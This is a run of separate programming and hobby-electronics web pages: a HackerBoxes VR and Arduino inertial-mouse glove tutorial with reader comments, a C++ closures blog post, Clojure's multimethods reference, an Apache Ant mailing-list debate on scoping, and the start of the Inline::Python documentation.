Importing Functions

Maybe you have a whole library written in Python that only needs one entry point. You'll want to import that function. It's as easy as this:

    use Inline Python;
    doit();
    __END__
    __Python__
    from mylibrary import doit

Inline::Python actually binds to every function in Python's "global" namespace (those of you in the know know that namespace is called '__main__'). So if you had another function there, you'd get that too.

Importing Classes

If you've written a library in Python, you'll make it object-oriented. That's just something Python folks do. So you'll probably want to import a class, not a function. That's just as easy:

    use Inline Python;
    my $obj = new Myclass;
    __END__
    __Python__
    from mylibrary import myclass as Myclass

New-Style Classes

As of Python 2.2, the Python internals have begun to change in a way which makes types 'look' more like classes. This means that your Python code can now subclass builtin Python types such as lists, tuples, integers, etc. It also means that identifying Python objects and creating Perl bindings for them has become a little trickier. See Guido's write-up and the relevant Python Enhancement Proposals (PEP), numbers 252 and 253, for details about the Python code. Also, see the mailing-list discussion for possible implications regarding C-language Python extensions.
This change should not affect code which uses Inline::Python, except that it allows you to bind to Python classes which have been written using these new features. In most cases, you will be importing an entire class from an external library as defined in the example above. In other cases, you may be writing Inline::Python code as follows:

    use Inline Python => <<'END';
    class Foo(object):
        def __init__(self):
            print "new Foo object being created"
            self.data = {}
        def get_data(self):
            return self.data
        def set_data(self,dat):
            self.data = dat
    END

Additional caveats may exist. Note that if the Python class subclasses one of the builtin types which would normally be accessible as a 'Perlish' translation, the instance will be an opaque object accessible only through its class methods.

    # Class is defined as 'def Class(float):'
    my $obj = Class->new(4);
    print $$obj, "\n"; # will NOT print '4.0'

New-Style Boundary Conditions

In this example, Bar isn't imported because it isn't a global -- it's hidden inside the function Foo(). But Foo() is imported into Perl, and it returns an instance of the Bar class. What happens then?

Whenever Inline::Python needs to return an instance of a class to Perl, it generates an instance of Inline::Python::Object, the base class for all Inline::Python objects. This base class knows how to do all the things you need: calling methods, in this case.

Exceptions

Exceptions thrown in Python code get translated to Perl exceptions, which you can catch using eval.

Using Perl inside Python (inside Perl)

The perl package exposes Perl packages and subs. It uses the same code as Inline::Python to automatically translate parameters and return values as needed. Packages and subs are represented as PerlPkg and PerlSub, respectively.

Using the PerlPkg Type

eval(source code)

Unlike Python, Perl has no exec() -- the eval() function always returns the result of the code it evaluated.
eval() takes exactly one argument, the perl source code, and returns the result of the evaluation. require() and use() require(module name) use(module name) Use require() instead of import. In Python, you'd say this:: __getattr__ Python's __getattr__() function allows the package to dynamically return something to satisfy the request. For instance, you can get at the subs in a perl package by using dir() (which is the same as When Inline::Python imports a class or function, it creates subs in Perl which delegate the action to some C functions I've written, which know how to call Python functions and methods. use Inline Python => <<'END'; class Foo: def __init__(self): print "new Foo object being created" self.data = {} def get_data(self): return self.data def set_data(self,dat): self.data = dat END Inline::Python actually generates this code and eval()s; } sub __init__ { splice @_, 1, 0, "__init__"; return &Inline::Python::py_call_method; } More about those py_* functions, and how to generate this snippet of code yourself, in the next section. The Do-it-yourselfer's Guide to Inline::Python END my $o = Inline::Python::Object->new('__main__', 'MyClass'); $o->put("candy", "yummy"); die "Ooops" unless $o->get("candy") eq 'yummy'; Inline::Python provides a full suite of exportable functions you can use to manipulate Python objects and functions "directly". py_eval()); py_eval(<<'END'); def Foo(): return 42 END #_eval(<<'END'); class Foo: def __init__(self): print "new Foo object being created" self.data = {} def get_data(self): return self.data def set_data(self,dat): self.data = dat END py_bind_class("main::Foo", "__main__", "Foo", "set_data", "get_data"); my $o = new Foo; This call to py_bind_class() will generate this code and eval(); } inheritance tree to the AUTOLOAD method. I recommend binding to the functions you know about, especially if you're the one writing the code. If it's auto-generated, use py_study_package(), described below. py_study_package() 11.4. 
It may work on older versions, but it will almost certainly not work with Python 3.

AUTHOR

Neil Watkiss <NEILW@cpan.org>

Brian Ingerson <INGY@cpan.org> is the author of Inline, Inline::C and Inline::CPR. He was responsible for much encouragement and many suggestions throughout the development of Inline::Python.

Eric Wilhelm provided support for 'new-style' classes in version 0.21. Many thanks, Eric!

Stefan Seifert <NINE@cpan.org> fixed some bugs and is the current co-maintainer.

All Rights Reserved. This module is free software. It may be used, redistributed and/or modified under the same terms as Perl itself.
https://metacpan.org/pod/release/NINE/Inline-Python-0.43/Python.pm
I was first exposed to Java after several years of C++ experience, so it seemed natural when I learned that Java does not allow method overloading based on return type. The Defining Methods section of the Classes and Objects lesson in the Java Language Tutorial states, "The compiler does not consider return type when differentiating methods, so you cannot declare two methods with the same signature even if they have a different return type." Indeed, as Vinit Joglekar has pointed out, "It is an accepted fact that Java does not support return-type-based method overloading." The StackOverflow thread Java - why no return type based method overloading? explains why this is the case in Java.

Given this, I was surprised when a colleague showed me a code snippet with two overloaded methods with the same runtime signature that compiled in JDK 6 as long as the return types differed. The following class compiles successfully with JDK 6, but not with JDK 7.

Compiles in JDK 6 But Not in JDK 7

package examples.dustin;

import java.util.Collection;

/**
 * Simple example that breaks in Java SE 7, but not in Java SE 6.
 *
 * @author Dustin
 */
public class Main
{
   public static String[] collectionToArray(final Collection<String> strings)
   {
      return new String[] { "five" };
   }

   public static int[] collectionToArray(final Collection<Integer> integers)
   {
      return new int[] { 5 };
   }

   /**
    * Main function.
    *
    * @param arguments The command line arguments; none expected.
    */
   public static void main(String[] arguments)
   {
   }
}

As described in Angelika Langer's What Is Method Overloading?, the above code should not compile. It doesn't in Java SE 7. In NetBeans 7.1, it doesn't. Or, more properly, it's a mixed bag. As the screen snapshot below demonstrates, NetBeans 7.1 builds the source code above fine (as shown in the Output Window) when the version of Java associated with the project is Java SE 6. However, the NetBeans editor shows the red squiggly lines indicating a compiler error.
The next image shows what the error message is.

Although NetBeans 7.1 is able to build the code shown above when it's part of a project associated with Java SE 6 (Update 31, in this case), the code editor still reports the error shown above. This is because NetBeans uses a different version of the Java compiler internally than the one explicitly associated with the project being edited. If I change the version of Java associated with the NetBeans project for the source code above, it will no longer build in NetBeans. This is shown next.

There are a couple of interesting things about this bug. First, the fact that this code compiles fine in Java SE 6 but is addressed and does not compile in Java SE 7 means that it is possible for code working in Java SE 6 to not work when the code base is moved to Java SE 7. I downloaded the latest version of JDK 6 available (Java SE 6 Update 31) and confirmed that the original code shown above still builds in Java SE 6. It does not build in Java SE 7.

There are other versions of the code above that do not build in Java SE 6 or in Java SE 7. For example, if the code above is changed so that the methods return the same type, the code doesn't build even in Java SE 6. Similarly, if the Collection parameters to the two overloaded methods include a "raw" Collection (no parameterized type), it won't compile in Java SE 6 either. Of course, even if the return types are different, if the same Collection parameterized types are passed to both overloaded methods, even Java SE 6 won't compile this. These three situations are depicted in the following three screen snapshots.

The code that builds in Java SE 6 but not in Java SE 7 needs to have overloaded methods that differ in both return types and in terms of the parameterized types of the collections that make up their method parameters. It doesn't matter if a given return type matches or is related to the parameterized type of the method's parameter, as long as they differ.
If the return types are the same, Java SE 6 detects a compiler error. Java SE 6 also detects the error if the parameters boil down to the same collection after erasure and the return types are not different.

A second interesting thing about this bug is how it is handled in NetBeans. Because NetBeans uses its own internal compiler that does not necessarily match the version of the compiler that the developer has associated with the IDE project, you can run into situations like this where the code actually builds in the IDE, but the IDE's functionality, such as code editors and project browsers, indicates the code is broken. Because NetBeans 7.1 uses its own internal Java compiler for the code editor, one might wonder if this means Java 7 features could be sneaked in and would work in the IDE but then would not build when attempted from the command line or when explicitly built in the IDE. The next screen snapshot demonstrates why that is not the case. In that snapshot, a Java 7-specific feature is in the code, and NetBeans 7.1 properly warns that this is not compatible with the Java 1.6 source setting.

Bug 6182950 (methods clash algorithm should not depend on return type) has addressed the issue in JDK 7, but not in JDK 6. A related bug is Bug 6730568 ("Type erasure affects return types + type parameters"). Three additional references that provide substantially more background details are two StackOverflow threads (Differing behaviour between Java 5 & 6 when overloading generic methods and What is the concept of erasure in generics in java?) and the Java Tutorial entry on Type Erasure.

The colleague who showed me this issue realized its existence because NetBeans 7.1 reported the "name clash ... have the same erasure" error even when he was working with Java SE 6 code. This discovery was "accidental," due to the newer version of NetBeans using the Java SE 7 compiler internally, but he welcomed the opportunity to fix the issue now rather than when he migrates to Java SE 7.
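The root cause of the name clash is type erasure: at runtime, Collection<String> and Collection<Integer> are the same class, so the two collectionToArray overloads erase to the same signature. A small demonstration of erasure via reflection (a hypothetical example, not from the original post):

```java
import java.util.ArrayList;
import java.util.List;

public class ErasureDemo {
    public static void main(String[] args) {
        List<String> strings = new ArrayList<>();
        List<Integer> integers = new ArrayList<>();

        // After erasure, both lists are plain ArrayLists: the type
        // parameter is gone at runtime, which is why two overloads
        // differing only in Collection<String> vs Collection<Integer>
        // clash once their return types stop distinguishing them.
        System.out.println(strings.getClass() == integers.getClass()); // prints true
        System.out.println(strings.getClass().getName()); // prints java.util.ArrayList
    }
}
```

This is also why the compiler, not the runtime, must catch the clash: by the time the bytecode exists, there is nothing left to dispatch on.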
I found this issue worth posting a blog post on because it provides a warning about a bug that may already be in some Java SE 6 code bases but will be made all too evident when the code base is moved to Java SE 7. I also posted this because I think it's important to be aware that modern versions of NetBeans use an internal compiler that may be of a different version than the compiler the developer has explicitly associated with his or her NetBeans project.

1 comment:

Hi Dustin,

That is very interesting. I understand that since you are passing generic types into the method signature, type erasure also had a bug which let code like this compile in JDK 6 (based on my rusty memory). It is, however, completely fixed in Java 7.

-Sathya
http://marxsoftware.blogspot.com/2012/03/netbeans-71s-internal-compiler-and-jdk.html
A beginner's guide to web scraping with Python

Get some hands-on experience with essential Python tools to scrape complete HTML sites.

There are plenty of great books to help you learn Python, but who actually reads these A to Z? (Spoiler: not me.)

Many people find instructional books useful, but I do not typically learn by reading a book front to back. I learn by doing a project, struggling, figuring some things out, and then reading another book. So, throw away your book (for now), and let's learn some Python.

What follows is a guide to my first scraping project in Python. It is very low on assumed knowledge in Python and HTML. This is intended to illustrate how to access web page content with the Python library requests and parse the content using BeautifulSoup4, as well as JSON and pandas. I will briefly introduce Selenium, but I will not delve deeply into how to use that library; that topic deserves its own tutorial. Ultimately I hope to show you some tricks and tips to make web scraping less overwhelming.

Installing our dependencies

All the resources from this guide are available at my GitHub repo. If you need help installing Python 3, check out the tutorials for Linux, Windows, and Mac.

$ python3 -m venv venv
$ source venv/bin/activate
$ pip install requests bs4 pandas

If you like using JupyterLab, you can run all the code using this notebook. There are a lot of ways to install JupyterLab, and this is one of them:

# from the same virtual environment as above, run:
$ pip install jupyterlab

Setting a goal for our web scraping project

Now we have our dependencies installed, but what does it take to scrape a webpage? Let's take a step back and be sure to clarify our goal. Here is my list of requirements for a successful web scraping project.

- We are gathering information that is worth the effort it takes to build a working web scraper.
- We are downloading information that can be legally and ethically gathered by a web scraper.
- We have some knowledge of how to find the target information in HTML code.
- We have the right tools: in this case, it's the libraries BeautifulSoup and requests.
- We know (or are willing to learn) how to parse JSON objects.
- We have enough data skills to use pandas.
A comment on HTML: While HTML is the beast that runs the Internet, what we mostly need to understand is how tags work. A tag is a collection of information sandwiched between angle-bracket enclosed labels. For example, here is a pretend tag, called "pro-tip":
<pro-tip> All you need to know about html is how tags work </pro-tip>
We can access the information in there ("All you need to know…") by calling its tag "pro-tip." How to find and access a tag will be addressed further in this tutorial. For more of a look at HTML basics, check out this article.
What to look for in a web scraping project
Some goals for gathering data are more suited for web scraping than others. My guidelines for what qualifies as a good project are as follows.
There is no public API available for the data. It would be much easier to capture structured data through an API, and it would help clarify both the legality and ethics of gathering the data. There needs to be a sizable amount of structured data with a regular, repeatable format to justify this effort. Web scraping can be a pain. BeautifulSoup (bs4) makes this easier, but there is no avoiding the individual idiosyncrasies of websites that will require customization. Identical formatting of the data is not required, but it does make things easier. The more "edge cases" (departures from the norm) present, the more complicated the scraping will be.
Disclaimer: I have zero legal training; the following is not intended to be formal legal advice.
On the note of legality, accessing vast troves of information can be intoxicating, but just because it's possible doesn't mean it should be done.
There is, thankfully, public information that can guide our morals and our web scrapers. Most websites have a robots.txt file associated with the site, indicating which scraping activities are permitted and which are not. It's largely there for interacting with search engines (the ultimate web scrapers). However, much of the information on websites is considered public information. As such, some consider the robots.txt file as a set of recommendations rather than a legally binding document. The robots.txt file does not address topics such as ethical gathering and usage of the data.
Questions I ask myself before beginning a scraping project:
- Am I scraping copyrighted material?
- Will my scraping activity compromise individual privacy?
- Am I making a large number of requests that may overload or damage a server?
- Is it possible the scraping will expose intellectual property I do not own?
- Are there terms of service governing use of the website, and am I following those?
- Will my scraping activities diminish the value of the original data (for example, do I plan to repackage the data as-is and perhaps siphon off website traffic from the original source)?
When I scrape a site, I make sure I can answer "no" to all of those questions.
For a deeper look at the legal concerns, see the 2018 publications Legality and Ethics of Web Scraping by Krotov and Silva and Twenty Years of Web Scraping and the Computer Fraud and Abuse Act by Sellars.
Now it's time to scrape!
After assessing the above, I came up with a project. My goal was to extract addresses for all Family Dollar stores in Idaho. These stores have an outsized presence in rural areas, so I wanted to understand how many there are in a rather rural state. The starting point is the location page for Family Dollar.
To begin, let's load up our prerequisites in our Python virtual environment. The code from here is meant to be added to a Python file (scraper.py if you're looking for a name) or be run in a cell in JupyterLab.
import requests # for making standard html requests
from bs4 import BeautifulSoup # magical tool for parsing html data
import json # for parsing data
from pandas import DataFrame as df # premier library for data organization
Next, we request data from our target URL.
page = requests.get("")
soup = BeautifulSoup(page.text, 'html.parser')
BeautifulSoup will take HTML or XML content and transform it into a complex tree of objects. Here are several common object types that we will use.
- BeautifulSoup—the parsed content
- Tag—a standard HTML tag, the main type of bs4 element you will encounter
- NavigableString—a string of text within a tag
- Comment—a special type of NavigableString
There is more to consider when we look at the output of requests.get(). I've only used page.text to translate the requested page into something readable, but there are other ways to read the response (note that text, content, and raw are attributes, while json() is a method):
- page.text for text (most common)
- page.content for byte-by-byte output
- page.json() for JSON objects
- page.raw for the raw socket response (no thank you)
I have only worked on English-only sites using the Latin alphabet. The default encoding settings in requests have worked fine for that. However, there is a rich internet world beyond English-only sites. To ensure that requests correctly decodes the content, you can set the encoding for the text:
page = requests.get(URL)
page.encoding = 'ISO-8859-1'
soup = BeautifulSoup(page.text, 'html.parser')
Taking a closer look at BeautifulSoup tags, we see:
- The bs4 element tag is capturing an HTML tag
- It has both a name and attributes that can be accessed like a dictionary: tag['someAttribute']
- If a tag has multiple attributes with the same name, only the first instance is accessed.
- A tag's children are accessed via tag.contents.
- All tag descendants can be accessed with tag.descendants.
- Instead of navigating the HTML tree, you can always search the full contents as a string with a regular expression: re.compile("your_string").
Determine how to extract relevant content
Warning: this process can be frustrating.
Extraction during web scraping can be a daunting process filled with missteps. I think the best way to approach this is to start with one representative example and then scale up (this principle is true for any programming task). Viewing the page's HTML source code is essential. There are a number of ways to do this.
You can view the entire source code of a page using Python in your terminal (not recommended). Run this code at your own risk:
print(soup.prettify())
While printing out the entire source code for a page might work for a toy example shown in some tutorials, most modern websites have a massive amount of content on any one of their pages. Even the 404 page is likely to be filled with code for headers, footers, and so on.
It is usually easiest to browse the source code via View Page Source in your favorite browser (right-click, then select "view page source"). That is the most reliable way to find your target content (I will explain why in a moment).
In this instance, I need to find my target content—an address, city, state, and zip code—in this vast HTML ocean. Often, a simple search of the page source (ctrl + F) will yield the section where my target content is located. Once I can actually see an example of my target content (the address for at least one store), I look for an attribute or tag that sets this content apart from the rest.
It would appear that first, I need to collect web addresses for different cities in Idaho with Family Dollar stores and visit those websites to get the address information. These web addresses all appear to be enclosed in an href attribute. Great!
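Before attacking the real page, the tag bullets above can be exercised on a tiny invented snippet (BeautifulSoup is installed in the setup section; the markup here is made up for illustration):

```python
from bs4 import BeautifulSoup

# Invented markup, just to poke at Tag objects; a real page is far messier.
soup = BeautifulSoup('<div id="store"><a href="/idaho">Idaho</a></div>',
                     'html.parser')

tag = soup.find('div')
print(tag.name)               # the tag's name: div
print(tag['id'])              # attributes read like a dictionary: store
print(tag.contents)           # direct children: [<a href="/idaho">Idaho</a>]
print(list(tag.descendants))  # all descendants, including the inner text
print(tag.get_text())         # Idaho
```

Everything below is just these few operations applied repeatedly to bigger soups.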
I will try searching for that using the find_all command:
dollar_tree_list = soup.find_all('href')
dollar_tree_list
Searching for href did not yield anything, darn. This might have failed because href is an attribute nested inside the class itemlist. For the next attempt, search on the class itemlist. Because "class" is a reserved word in Python, class_ is used instead. The bs4 function soup.find_all() turned out to be the Swiss army knife of bs4 functions.
dollar_tree_list = soup.find_all(class_ = 'itemlist')
for i in dollar_tree_list[:2]:
    print(i)
Anecdotally, I found that searching for a specific class was often a successful approach. We can learn more about the object by finding out its type and length.
type(dollar_tree_list)
len(dollar_tree_list)
The content from this BeautifulSoup "ResultSet" can be extracted using .contents. This is also a good time to create a single representative example.
example = dollar_tree_list[2] # a representative example
example_content = example.contents
print(example_content)
Use .attrs to find what attributes are present in the contents of this object. Note: .contents usually returns a list of exactly one item, so the first step is to index that item using bracket notation.
example_content = example.contents[0]
example_content.attrs
Now that I can see that href is an attribute, it can be extracted like a dictionary item:
example_href = example_content['href']
print(example_href)
Putting together our web scraper
All that exploration has given us a path forward. Here's the cleaned-up version of the logic we figured out above.
city_hrefs = [] # initialise empty list
for i in dollar_tree_list:
    cont = i.contents[0]
    href = cont['href']
    city_hrefs.append(href)

# check to be sure all went well
for i in city_hrefs[:2]:
    print(i)
The output is a list of URLs of Family Dollar stores in Idaho to scrape. That said, I still don't have address information! Now, each city URL needs to be scraped to get this information.
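The cleaned-up collection loop can be tried end-to-end on a toy snippet. The markup below is invented (the real Family Dollar page differs), but the shape of the logic is the same:

```python
from bs4 import BeautifulSoup

# A simplified stand-in for the kind of markup described above.
html = """
<ul>
  <li class="itemlist"><a href="/locations/id/boise">Boise</a></li>
  <li class="itemlist"><a href="/locations/id/nampa">Nampa</a></li>
</ul>
"""
soup = BeautifulSoup(html, "html.parser")

city_hrefs = []
for item in soup.find_all(class_="itemlist"):
    cont = item.contents[0]          # first child of the <li>: the <a> tag
    city_hrefs.append(cont["href"])  # attributes read like a dictionary

print(city_hrefs)  # ['/locations/id/boise', '/locations/id/nampa']
```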
So we restart the process, using a single, representative example.
page2 = requests.get(city_hrefs[2]) # again establish a representative example
soup2 = BeautifulSoup(page2.text, 'html.parser')
The address information is nested within type="application/ld+json". After doing a lot of geolocation scraping, I've come to recognize this as a common structure for storing address information. Fortunately, soup.find_all() also enables searching on type.
arco = soup2.find_all(type="application/ld+json")
print(arco[1])
The address information is in the second list member! Finally!
I extracted the contents (from the second list item) using .contents (this is a good default action after filtering the soup). Again, since the output of contents is a list of one, I indexed that list item:
arco_contents = arco[1].contents[0]
arco_contents
Wow, looking good. The format presented here is consistent with the JSON format (also, the type did have "json" in its name). A JSON object can act like a dictionary with nested dictionaries inside. It's actually a nice format to work with once you become familiar with it (and it's certainly much easier to program than a long series of RegEx commands). Although this structurally looks like a JSON object, it is still a bs4 object and needs a formal programmatic conversion to JSON to be accessed as a JSON object:
arco_json = json.loads(arco_contents)
type(arco_json)
print(arco_json)
In that content is a key called address that has the desired address information in the smaller nested dictionary. This can be retrieved thusly:
arco_address = arco_json['address']
arco_address
Okay, we're serious this time.
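That json.loads step can be exercised on its own. The fragment below is made up, shaped like the JSON-LD store data described above (field names follow the schema.org PostalAddress convention, not the actual page):

```python
import json

# A made-up JSON-LD fragment, shaped like the store data described above.
ld_json = """
{
  "@type": "Store",
  "address": {
    "@type": "PostalAddress",
    "streetAddress": "123 Main St",
    "addressLocality": "Boise",
    "addressRegion": "ID",
    "postalCode": "83702"
  }
}
"""

# json.loads turns the string into nested dictionaries...
store = json.loads(ld_json)

# ...so the address is just a key lookup away.
address = store["address"]
print(address["addressLocality"], address["postalCode"])  # Boise 83702
```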
Now I can iterate over the list of store URLs in Idaho:
locs_dict = [] # initialise empty list
for link in city_hrefs:
    locpage = requests.get(link) # request page info
    locsoup = BeautifulSoup(locpage.text, 'html.parser') # parse the page's content
    locinfo = locsoup.find_all(type="application/ld+json") # extract specific element
    loccont = locinfo[1].contents[0] # get contents from the bs4 element set
    locjson = json.loads(loccont) # convert to json
    locaddr = locjson['address'] # get address
    locs_dict.append(locaddr) # add address to list
Cleaning our web scraping results with pandas
We have loads of data in a dictionary, but we have some additional crud that will make reusing our data more complex than it needs to be. To do some final data organization steps, we convert to a pandas data frame, drop the unneeded columns ("@type" and "addressCountry"), and check the top five rows to ensure that everything looks alright.
locs_df = df.from_records(locs_dict)
locs_df.drop(['@type', 'addressCountry'], axis = 1, inplace = True)
locs_df.head(n = 5)
Make sure to save results!!
locs_df.to_csv("family_dollar_ID_locations.csv", sep = ",", index = False)
We did it! There is a comma-separated list of all the Idaho Family Dollar stores. What a wild ride.
A few words on Selenium and data scraping
Selenium is a common utility for automatic interaction with a webpage. To explain why it's essential to use at times, let's go through an example using Walgreens' website. Inspect Element provides the code for what is displayed in a browser:
While View Page Source provides the code for what requests will obtain:
When these two don't agree, there are plugins modifying the source code—so, it should be accessed after the page has loaded in a browser. requests cannot do that, but Selenium can.
Selenium requires a web driver to retrieve the content. It actually opens a web browser, and this page content is collected.
Selenium is powerful—it can interact with loaded content in many ways (read the documentation). After getting data with Selenium, continue to use BeautifulSoup as before:
from selenium import webdriver # import needed for the snippet below
url = ""
driver = webdriver.Firefox(executable_path = 'mypath/geckodriver.exe')
driver.get(url)
soup_ID = BeautifulSoup(driver.page_source, 'html.parser')
store_link_soup = soup_ID.find_all(class_ = 'col-xl-4 col-lg-4 col-md-4')
I didn't need Selenium in the case of Family Dollar, but I do keep it on hand for those times when rendered content differs from source code.
Wrapping up
In conclusion, when using web scraping to accomplish a meaningful task:
- Be patient
- Consult the manuals (these are very helpful)
If you are curious about the answer: There are many, many Family Dollar stores in America.
The complete source code is:
import requests
from bs4 import BeautifulSoup
import json
from pandas import DataFrame as df

page = requests.get("")
soup = BeautifulSoup(page.text, 'html.parser')

# find all state links
state_list = soup.find_all(class_ = 'itemlist')
state_links = []
for i in state_list:
    cont = i.contents[0]
    attr = cont.attrs
    hrefs = attr['href']
    state_links.append(hrefs)

# find all city links
city_links = []
for link in state_links:
    page = requests.get(link)
    soup = BeautifulSoup(page.text, 'html.parser')
    familydollar_list = soup.find_all(class_ = 'itemlist')
    for store in familydollar_list:
        cont = store.contents[0]
        attr = cont.attrs
        city_hrefs = attr['href']
        city_links.append(city_hrefs)

# to get individual store links
store_links = []
for link in city_links:
    locpage = requests.get(link)
    locsoup = BeautifulSoup(locpage.text, 'html.parser')
    locinfo = locsoup.find_all(type="application/ld+json")
    for i in locinfo:
        loccont = i.contents[0]
        locjson = json.loads(loccont)
        try:
            store_url = locjson['url']
            store_links.append(store_url)
        except:
            pass

# get address and geolocation information
stores = []
for store in store_links:
    storepage = requests.get(store)
    storesoup = BeautifulSoup(storepage.text,
                               'html.parser')
    storeinfo = storesoup.find_all(type="application/ld+json")
    for i in storeinfo:
        storecont = i.contents[0]
        storejson = json.loads(storecont)
        try:
            store_addr = storejson['address']
            store_addr.update(storejson['geo'])
            stores.append(store_addr)
        except:
            pass

# final data parsing
stores_df = df.from_records(stores)
stores_df.drop(['@type', 'addressCountry'], axis = 1, inplace = True)
stores_df['Store'] = "Family Dollar"
stores_df.to_csv("family_dollar_locations.csv", sep = ",", index = False)
--
Author's note: This article is an adaptation of a talk I gave at PyCascades in Portland, Oregon on February 9, 2020.
3 Comments
wonderful article, thanks
When I scrape a JSON from another site I get 'b' and random characters. Any idea why?
This is a great guide, thank you! I appreciate that you also thought to mention the ethical considerations--it probably wouldn't have occurred to me to consider that otherwise.
https://opensource.com/article/20/5/web-scraping-python
CC-MAIN-2020-34
refinedweb
2,983
57.27
Country Search > Bangladesh > import item: 84 Product(s) found from 38 Suppliers Sort by: View: List View Gallery View Order Quantity Hot import item Directory: Recommended import item Haven't found the right supplier yet ? AliSourcePro Tell us what you buy, Alibaba's Industry Sourcing Specialists will help you match the right suppliers. Post Buying Request Now >> Want product and industry knowledge for "import ite..." ? Trade Alert Trade Alerts are FREE updates on topics such as trending hot products, buying requests and supplier information - sent directly to your email inbox! Do you want to show import item or other products of your own company? Display your Products FREE now! Category - 100% Cotton Fabric (25) - T-Shirts (21) - Women's Panties (1) - Men's T-Shirts (12) - Ladies' Blouses & Tops (9) - Pants & Trousers (3) - View more - Other Electronic Components (1) Other Category Material - 100% Cotton (35) - Other (15) Product Type - Shirts (1) - Panties (1) - T-Shirts (21) - Blouses & Tops (9) Welcome to Alibaba.com Over 2 million supplier storefronts Safe and simple trade solutions Easily access verified suppliers User Guide Not sure how to use Alibaba.com? Want to source safely and easily?
http://www.alibaba.com/countrysearch/BD/import-item.html
CC-MAIN-2013-48
refinedweb
192
50.97
After a long vacation with my children, I've been meditating on the virtues of silence.
Python is a glorious toybox bursting with fun gadgets to delight TA's near and far. You can easily use it to stuff anything from database access to a serial port controller into your copy of Maya, which is always fun (and occasionally useful). However, the plethora of Python libraries out there does bring with it a minor annoyance - if you grab something cool off the cheeseshop you don't know exactly how the author wants to communicate with users. All too often you incorporate something useful into your Maya and suddenly your users have endless reams of debug printouts in their script listener — info that might make sense to a coder or a sysadmin but which is just noise (or worse, slightly scary) for your artists.
If you're suffering from overly verbose external modules, you can get a little peace and quiet with this little snippet. The Silencer class is just a simple context manager that hijacks sys.stdout and sys.stderr into a pair of StringIOs that will just silently swallow any printouts that would otherwise go to the listener.

import sys
from StringIO import StringIO


class SilencedError(Exception):
    pass


class Silencer(object):
    '''
    Suppress stdout and stderr.

    stdout and stderr are redirected into StringIOs. At exit, their
    contents are dumped into the string fields 'out' and 'err'.

    Typically use this via the with statement. For example::

        with Silencer() as fred:
            print stuff
        result = fred.out

    Note that if you use a Silencer to close down output from the logging
    module, you should call logging.shutdown() inside the with block.
    '''

    def __init__(self, enabled=True):
        self.oldstdout = sys.stdout
        self.oldstderr = sys.stderr
        self._outhandle = None
        self._errhandle = None
        self.out = ""
        self.err = ""
        self.enabled = enabled

    def __enter__(self):
        if self.enabled:
            self.oldstdout = sys.stdout
            self.oldstderr = sys.stderr
            sys.stdout = self._outhandle = StringIO()
            sys.stderr = self._errhandle = StringIO()
            self._was_entered = True
            return self
        else:
            self._was_entered = False

    def _restore(self):
        if self._was_entered:
            self.out = self._outhandle.getvalue()
            self.err = self._errhandle.getvalue()
            sys.stdout = self.oldstdout
            sys.stderr = self.oldstderr
            self._outhandle.close()
            self._errhandle.close()
            self._outhandle = self._errhandle = None

    def __exit__(self, type, value, tb):
        se = None
        try:
            if type:
                se = SilencedError(type, value, tb)
        except:
            pass
        finally:
            self._restore()
        if se:
            raise se

If you actually need to look at the spew you can just look at the contents of the out and err fields of the Silencer. More commonly though you'll just want to wrap a particularly verbose bit of code in a with… as block to shut it up. You'll also get the standard context manager behavior: an automatic restore in the event of an exception, etc.
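For what it's worth, modern Python 3 ships the core of this pattern in the standard library. Here is a minimal sketch of the same idea with contextlib.redirect_stdout and redirect_stderr (not the author's Maya-flavored version, just the bare mechanism):

```python
import sys
from contextlib import redirect_stdout, redirect_stderr
from io import StringIO

# Capture anything printed inside the block, instead of letting it
# reach the console (or Maya's script listener).
captured_out = StringIO()
captured_err = StringIO()
with redirect_stdout(captured_out), redirect_stderr(captured_err):
    print("noisy library output")
    print("scary warning", file=sys.stderr)

# Outside the block, stdout/stderr are restored automatically and the
# captured text is available for inspection, like Silencer's out/err.
print(captured_out.getvalue())  # noisy library output
print(captured_err.getvalue())  # scary warning
```

Unlike Silencer, this version re-raises the original exception rather than wrapping it, which is usually what you want.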
https://theodox.github.io/2014/sounds_of_silence
CC-MAIN-2017-26
refinedweb
468
53.81
This article comes from: PerfMa technology community
Summary
With a JDK8 upgrade, most problems are encountered at compile time, but sometimes it is more painful than that: the code compiles cleanly and only fails at run time, as in today's topic. So when you upgrade, you still need to test thoroughly before going online. Of course, JDK8 brings us a lot of dividends, and it is worth taking a little time to upgrade.
Problem description
As usual, let's start with a demo to show intuitively what we are going to discuss.
public class Test {
    static <T extends Number> T getObject() {
        return (T)Long.valueOf(1L);
    }
    public static void main(String... args) throws Exception {
        StringBuilder sb = new StringBuilder();
        sb.append(getObject());
    }
}
The demo is very simple. There is a generic method getObject whose return type is a subclass of Number. We then pass its return value to the overloaded append method of StringBuilder. There are many append overloads with many parameter types, but none whose parameter is Number. If there were one, you can guess that it would be preferred. Since there is none, which one will be chosen?
We compile the above class with JDK6 (JDK7 behaves similarly) and with JDK8, and then use javap to inspect the output (only the main method is shown):
Bytecode compiled by JDK6:
public static void main(java.lang.String...)
  throws java.lang.Exception
    ...
    12: invokevirtual #6 // Method java/lang/StringBuilder.append:(Ljava/lang/Object;)Ljava/lang/StringBuilder;
    15: pop
    16: return
  LineNumberTable:
    line 8: 0
    line 9: 8
    line 10: 16
  Exceptions:
    throws java.lang.Exception
Bytecode compiled by JDK8:
public static void main(java.lang.String...)
  throws java.lang.Exception
  descriptor: ([Ljava/lang/String;)V
    ...
    12: checkcast     #6 // class java/lang/CharSequence
    15: invokevirtual #7 // Method java/lang/StringBuilder.append:(Ljava/lang/CharSequence;)Ljava/lang/StringBuilder;
    18: pop
    19: return
  LineNumberTable:
    line 8: 0
    line 9: 8
    line 10: 19
  Exceptions:
    throws java.lang.Exception
Comparing the two outputs, we can see that the bytecode differs starting at bci 12. The following line is added under JDK8, indicating that a type check should be performed on the value at the top of the stack, to see whether it is of type CharSequence:
12: checkcast #6 // class java/lang/CharSequence
In addition, the append method of StringBuilder that gets called is also different. Under JDK6/7 the append(Object) overload is called, while under JDK8 the append(CharSequence) overload is called.
Now run the above code under JDK6 and JDK8. It runs normally under JDK6, but throws an exception under JDK8:
Exception in thread "main" java.lang.ClassCastException: java.lang.Long cannot be cast to java.lang.CharSequence
    at Test.main(Test.java:9)
At this point, the whole problem should be clearly described.
Problem analysis
First, let's talk about how the Java compiler implements this. Most of it is straightforward; the focus is on how the compiler decides which append overload to use for:
sb.append(getObject());
